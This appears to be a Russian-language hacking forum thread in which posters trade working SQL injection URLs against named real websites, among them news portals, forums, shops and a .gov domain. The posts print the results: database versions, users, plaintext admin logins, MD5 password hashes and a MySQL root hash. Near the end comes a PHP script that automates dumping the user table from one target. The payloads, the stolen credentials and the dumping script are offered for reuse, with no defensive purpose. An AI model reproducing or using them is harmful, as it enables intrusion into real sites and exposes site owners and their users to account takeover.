http://haberolay.net/detay.php?id=-6389+union+select+1,2,3,4,table_name,6, 7,8,9+from+information_schema.tables+limit+160,1/* http://haberolay.net/detay.php?id=-6389+union+select+1,2,3,4,column_name,6, 7,8,9+from+information_schema.columns+where+table_name=0x62775f75736572/* http://haberolay.net:2082/login/ version : 5.0.45-community user : haberola_osman@localhost database :haberola_osman
//********************************* http://www.skyphoto.ru/forum/post.php?a=new_post&forum=-3+union+select+1,concat_ws(char(58),username,password,email),3,4+from+u9758.sp_users+limit+1/* forum: admin:AV-natali //************************************ http://tchirkounov.ru/forum/post.php?a=new_post&forum=-2+union+select+1,version(),3,4/* 4.0.24_Debian-10sarge3 chirnalog@localhost dbchirnalog //*************************************** http://www.is.ru-b.de/gboard/post.php?a=new_post&forum=-3+union+select+1,version(),3,4/* 4.0.27-standard-log [email protected] db18967113 //************************************** http://wikipediawiki.org/post.php?a=new_post&forum=-1+union+select+1,version(),3,4 5.0.54 [email protected] ulrik_db0 //*************************************** http://www.hurstwoodfarmpianos.co.uk/news.php?news_id=-16+union+select+1,2,concat_ws(char(58),username,password),4,5,6,7,8,9,10+from+user+limit+1+offset+0/* marcus68:jerseybean nawaraj:samsanjog dain:cobnuts pingpong@localhost 4.1.20 piano Apache/2.0.52 (Red Hat) //**************************** http://www.atur.com.ua/index.php?id=-903+union+select+1,2,3,4,5,6+from+users/* atur@localhost 4.1.22 atur
medinform.biz Code: http://www.medinform.biz/produser1.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13/* 4.1.22 : medinfo5main@localhost : medinfo5main далее: Code: http://www.medinform.biz/produser1.php?id=-1+union+select+1,2,concat(name,0x3a,pas),4,5,6,7,8,9,10,11,12,13+from+users/* Администратор : 123456789 =)
morozilnik.ru Какой-то шоп бытовой техники с весьма экзотическим названием): Code: http://morozilnik.ru/eng/info/?code=1+union+select+1, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* 5.0.32-Debian_7etch3-log morozini@localhost morozini
revolution.co.uk Code: http://www.revolution.co.uk/_forum.php?neuron=1&topic=4981&message=-58008 union select 1,2,3,aes_decrypt(aes_encrypt(version(),0x71), 0x71),5,6,7,8,9/* "4.1.11-Debian_4sarge8-log" "revuser@localhost" "lucybase" P.s из той же серии Code: http://www.720games.com/_forum.php?neuron=1&topic=2&message=12' http://www.yorkshirekoi.co.uk/_forum.php?neuron=6&topic=20558&message=164530'
Продажа авто в спб! http://www.autoway.spb.ru/show.php?id=-142+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(table_schema,0x3a,table_name,0x3a,column_name),17,18+from+information_schema.columns+limit+191,1/* http://www.autoway.spb.ru/show.php?id=-142+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(table_schema,0x3a,table_name,0x3a,column_name),17,18+from+information_schema.columns+limit+192,1/* http://www.autoway.spb.ru/show.php?id=-142+union+select+1,2,3,4,5,6,7,8,9,us_login,us_pass,12,13,14,15,16,17,18+from+x7_ows_user/* http://www.autoway.spb.ru/admin/ Login: Admin Pass: admin1
http://www.trekstor.de/en/products/detail_hdd.php?pid=-15+union+select+1,us er(),3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6/* version: 4.0.27-standard user : dbo175992425@localhost database :db175992425 зы спасибо всем тем кто оценивает мою работу плюсами.
Закладки: Code: http://www.social-bookmarks.ru/?item_id=99999999999999+union+select+1,convert(concat(database(),0x09,user(),0x09,version())+using+cp1251),3,4+limit+0,1--
http://www.rededular.com.br/catalogo-sec.php?codcat=3&codsec=-60+uni on+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1+from+infor mation_schema.tables+lim it+1,1/* version:5.0.22 user:rededular@localhost database : rededular ну а дальше все зависит от вашей фантазии
heavymetalsociety.org Code: http://www.heavymetalsociety.org/interview.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/* 4.1.22standard:heavymet@localhost:heavymet_hmssite Code: http://www.heavymetalsociety.org/interview.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6+from+users+limit+1,1/* Первые 10 юзеров: duncang:f02937159a1e31d72c7114bfe2d83015::renegades: - админ Sanitarium:44a4dc99148a7577f78578177202dd7b::: Colm C:eb95fc1ab8251cf1f8f870e7e4dae54d::megadeth: The Noonster:f1a81d782dea6a19bdca383bffe68452::spider: apoc:a25e01bddca85cdf4a4a3dafdd3aaa05::apoc: Decrepit:2ccd23d1cd0f95dc6984215a1f1b31ca::sludge: GravesOfYourMother:594bca3f02fc8fcfe8133ce01b4e3f43::graves: Retorzio:fea1804c38c3e141e51894528967c4dc::: Tsunekuni:597cee5b6e97930735991ad87fd423bc::: Vagina Squasher:aa2d6e4f578eb0cfaba23beef76c2194::free:
best49.eu Code: http://www.best49.eu/index.php?cat=-1+union+select+1,concat_ws(0x3,version(),user(),database()),3/* 4.1.22-standardbest49e_user1@localhostbest49e_best49 Code: http://www.best49.eu/index.php?cat=-1+union+select+1,concat(username,0x3,passwd),3+from+users/* webmastertest b490ubgjhmix b49101gtarqlud
http://www.posugf.com.br/site_2008/curso.php?ID_Curso=-103+uni on+select+1,2,3,4,5-- version : 4.1.13-Debian_0.dotdeb.1-log user : [email protected] database: sistema_homologacao
http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,ta ble_name,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+information_schema.tables+limit+28,1/* http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,column_name,3,4 ,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+information_schema.columns+where+table_name=0x6162637a5f7573756172696f+limit+1,1/* http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,concat_ws(0x3a,no me,0x3a,email,0x3a,senha,0x3a,login),3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+abcz_usuario+limit+0,1/* version :5.0.27-community-nt-log user: nelore1@localhost database: nelore1 ЗЫ Мне очень не нравится когда после того как я выложил на ачат скулю, какой нибудь киндер быстренько дефейснет сайт...выкладывать админку не буду.. уж извините.Всего доброго !
falconleader.eu Code: http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/* 5.0.27[email protected]fiorano Code: http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat(name,0x3,passw),3,4,5,6,7,8,9,10,11,12+from+users/* Sampsa346a55ca940cea871ae30d7c605c0b8a
openworld.gov _http://www.openworld.gov/article/print.php?id=1 and 1=1 _http://www.openworld.gov/article/print.php?id=1 and 1=2
http://www.fromthetop.org/ PR:6 Code: http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+mysql.user/* root:*CF57A666D82A1A6E307947399943403DD93CF490
Выводит всю базу . PHP: <? echo "<pre>\n"; @set_time_limit(0); @ini_set("display_errors","0"); $hostname = gethostbyname('fromthetop.org'); function from($from) { global $hostname; $responce = ""; $fsock = fsockopen($hostname,80,$errnum,$errstr,2); $headers = "GET hhttp://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+$from/* HTTP/1.1\n"; $headers .= "Host: my-photo.ru\n"; $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n"; $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n"; $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n"; $headers .= "Keep-Alive: 500\n"; $headers .= "Connection: close\n"; $headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; fwrite ($fsock,$headers); while (!feof($fsock)) $responce .= fread($fsock,1024); fclose ($fsock); $patern = "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i"; if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...'; //echo $responce; } from("mysql.user"); echo "</pre>"; ?>
http://www.leuragardensfestival.com.au/page.php?id=-23+un ion+select+1,2, 3,4,5,6,7, 8,9,0/* version :4.0.15-Max user: leuragar@localhost database : leuragar_db